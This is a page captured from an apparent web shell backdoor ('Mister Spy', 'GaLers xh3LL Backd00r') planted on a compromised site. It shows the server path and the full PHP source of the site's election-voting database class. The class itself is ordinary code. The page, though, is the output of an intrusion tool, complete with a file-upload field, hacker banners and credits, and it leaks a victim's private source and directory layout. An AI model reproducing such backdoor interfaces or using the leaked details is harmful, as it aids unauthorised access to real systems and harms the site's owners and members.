Mister Spy Say ="Hello Kids ... :D" ___ ____ _ _____ | \/ (_) | | / ___| | . . |_ ___| |_ ___ _ __ \ `--. _ __ _ _ | |\/| | / __| __/ _ \ '__| `--. \ '_ \| | | | | | | | \__ \ || __/ | /\__/ / |_) | |_| | \_| |_/_|___/\__\___|_| \____/| .__/ \__, | | | __/ | |_| |___/ Bot Mister Spy V3
Mister Spy

Mister Spy

Current Path : /home/caballoscriollos/www/espanol/library/
Upload File :
Current File : /home/caballoscriollos/www/espanol/library/class.votacioneselecciones.php

<?php 

require_once('class.dbaccess.php');
require_once('class.votacioneleccion.php');
require_once('class.filter.php');
require_once('class.page.php');

class VotacionesElecciones extends DBAccess implements IFilterable
{
	public function ParseFilter(array $filter)
	{
		$sql = ' WHERE 1';
		
		if (isset($filter['Nombre']) && ($filter['Nombre'] != ''))
			$sql.= " AND Nombre LIKE '%" . DB::StringUnquoted($filter['Nombre']) . "%'";
		
		if (isset($filter['IdZona']) && ($filter['IdZona'] != ''))
			$sql.= " AND IdZona = " . DB::Number($filter['IdZona']);
		
		if (isset($filter['IdUsuario']) && ($filter['IdUsuario'] != ''))
			$sql.= " AND IdUsuario = " . DB::Number($filter['IdUsuario']);
		
		if (isset($filter['IdSocio']) && ($filter['IdSocio'] != ''))
			$sql.= " AND IdSocio = " . DB::Number($filter['IdSocio']);
		
		if (isset($filter['NumeroSocio']) && ($filter['NumeroSocio'] != ''))
			$sql.= " AND IdSocio IN (SELECT IdSocio FROM tblSociosAccc WHERE NumeroSocio LIKE '%" . DB::StringUnquoted($filter['NumeroSocio']) . "%')";
		
		if (isset($filter['Socio']) && ($filter['Socio'] != ''))
			$sql.= " AND IdSocio IN (SELECT IdSocio FROM tblSociosAccc WHERE Nombre LIKE '%" . DB::StringUnquoted($filter['Socio']) . "%')";
		
		if (isset($filter['IdVotacion']) && ($filter['IdVotacion'] != ''))
			$sql.= " AND IdVotacion = " . DB::Number($filter['IdVotacion']);
		
		if (isset($filter['FechaDesde']) && ($filter['FechaDesde'] != ''))
			$sql.= " AND Fecha >= " . DB::Date($filter['FechaDesde']);
		
		if (isset($filter['FechaHasta']) && ($filter['FechaHasta'] != ''))
			$sql.= " AND Fecha <= " . DB::Date($filter['FechaHasta'] . ' 23:59:59');

		return $sql;
	}


	public function GetPagesCount(Page $oPage, array $filter = NULL)
	{	
		$Count = $this->GetCountRows($filter);

		$Count = $Count / $oPage->Size;
		
		return ceil($Count);
	}


	public function GetAll(array $filter = NULL, Page $oPage = NULL)
	{
		$sql = "SELECT *";
		$sql.= " FROM tblVotacionesElecciones";

		if ($filter)
			$sql.= $this->ParseFilter($filter);

		$sql.= " ORDER BY Fecha DESC";
		
		if ($oPage != NULL)
			$sql.= " " . Pageable::ParsePage($oPage);
						
		if (!($oRes = $this->GetQuery($sql)))
			return false;
			
		$arr = array();
			
		while ($oRow = $oRes->GetRow())	
		{	
			$oVotacionEleccion = new VotacionEleccion();
			$oVotacionEleccion->ParseFromArray($oRow);
			
			array_push($arr, $oVotacionEleccion);
			
			$oRes->MoveNext();
		}	
		
		return $arr;		
	}


	public function GetById($IdVotacion)
	{
		$sql = "SELECT *";
		$sql.= " FROM tblVotacionesElecciones";
		$sql.= " WHERE IdVotacion = " . DB::Number($IdVotacion);	
			
		if (!($oRes = $this->GetQuery($sql)))
			return false;
			
		if (!($oRow = $oRes->GetRow()))
			return false;
		
		$oVotacionEleccion = new VotacionEleccion();
		$oVotacionEleccion->ParseFromArray($oRow);
		
		return $oVotacionEleccion;		
	}
	

	public function GetCountRows(array $filter = NULL)
	{
		$sql = "SELECT *";
		$sql.= " FROM tblVotacionesElecciones";

		if ($filter)
			$sql.= $this->ParseFilter($filter);

		if (!($oRes = $this->GetQuery($sql)))
			return false;
		
		$CountRows = $oRes->NumRows();
		
		return $CountRows;
	}
	
	private function GetArrayDB(VotacionEleccion $oVotacionEleccion)
	{
		$arr = array
		(
			'IdUsuario'			=> DB::Number($oVotacionEleccion->IdUsuario),
			'IdSocio' 			=> DB::Number($oVotacionEleccion->IdSocio),
			'Fecha' 			=> DB::Date($oVotacionEleccion->Fecha),
			'IdZona' 			=> DB::Number($oVotacionEleccion->IdZona),
			'IdDelegado' 		=> DB::Number($oVotacionEleccion->IdDelegado)
		);
		
		return $arr;
	}

	public function Create(VotacionEleccion $oVotacionEleccion)
	{
		$arr = $this->GetArrayDB($oVotacionEleccion);

		if (!$this->Insert('tblVotacionesElecciones', $arr))
			return false;
			
		$oVotacionEleccion->IdVotacion = DBAccess::GetLastInsertId();

		return $oVotacionEleccion;
	}

	public function Update(VotacionEleccion $oVotacionEleccion)
	{
		$where = " IdVotacionEleccion = " . DB::Number($oVotacionEleccion->IdVotacionEleccion);
		
		$arr = $this->GetArrayDB($oVotacionEleccion);
		

		if (!DBAccess::Update('tblVotacionesElecciones', $arr, $where))
			return false;
		
		return $oVotacionEleccion;
	}
	

	public function Delete($IdVotacion)
	{
		$where = " IdVotacion = " . DB::Number($IdVotacion);

		if (!DBAccess::Delete('tblVotacionesElecciones', $where))
			return false;
		
		return true;	
	}
}

?>

Mr. DellatioNx196 GaLers xh3LL Backd00r 1.0, Coded By Mr. DellatioNx196 - Bogor BlackHat